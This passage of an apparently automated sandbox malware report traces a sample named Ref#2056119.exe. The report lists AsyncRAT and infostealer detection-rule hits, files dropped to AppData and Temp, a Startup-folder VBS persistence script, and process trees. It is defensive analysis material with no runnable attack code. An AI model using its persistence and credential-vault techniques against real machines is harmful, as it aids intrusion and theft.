                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074923307_2_07492330
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0749CA487_2_0749CA48
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0749CA387_2_0749CA38
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0749392A7_2_0749392A
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074C67DB7_2_074C67DB
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074C37987_2_074C3798
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074C4E387_2_074C4E38
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074CBBC87_2_074CBBC8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074CBBD87_2_074CBBD8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074CA9D87_2_074CA9D8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074CA9E87_2_074CA9E8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074C00407_2_074C0040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074C00067_2_074C0006
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_077000407_2_07700040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_077003677_2_07700367
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_077012487_2_07701248
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_078F00077_2_078F0007
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_078F00407_2_078F0040
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 8_2_013816808_2_01381680
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_013B41C812_2_013B41C8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_013BE28012_2_013BE280
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_013BAA1812_2_013BAA18
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_013B4A9812_2_013B4A98
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_013B3E8012_2_013B3E80
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6666812_2_06B66668
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6564012_2_06B65640
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6241812_2_06B62418
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B67DF012_2_06B67DF0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6B2B012_2_06B6B2B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6C20012_2_06B6C200
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6771012_2_06B67710
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6E41812_2_06B6E418
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B65D7012_2_06B65D70
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6004012_2_06B60040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 12_2_06B6000612_2_06B60006
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932
                      Source: Ref#2056119.exeStatic PE information: invalid certificate
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.000000000108E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2059133094.0000000007680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLiphk vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2053393935.0000000006F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZtyrhxmwj.dll" vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLiphmahu.exeF vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#2056119.exe
                      Source: Ref#2056119.exe, 00000005.00000002.3110409320.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Ref#2056119.exe
                      Source: Ref#2056119.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Ref#2056119.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Liphmahu.exe.0.dr, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: ishon.exe.0.dr, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#2056119.exe.40d0d40.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@13/4@2/3
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:64:WilError_03
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Local\Temp\Liphmahu.exeJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                      Source: Ref#2056119.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#2056119.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#2056119.exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile read: C:\Users\user\Desktop\Ref#2056119.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: ncryptsslp.dllJump to behavior
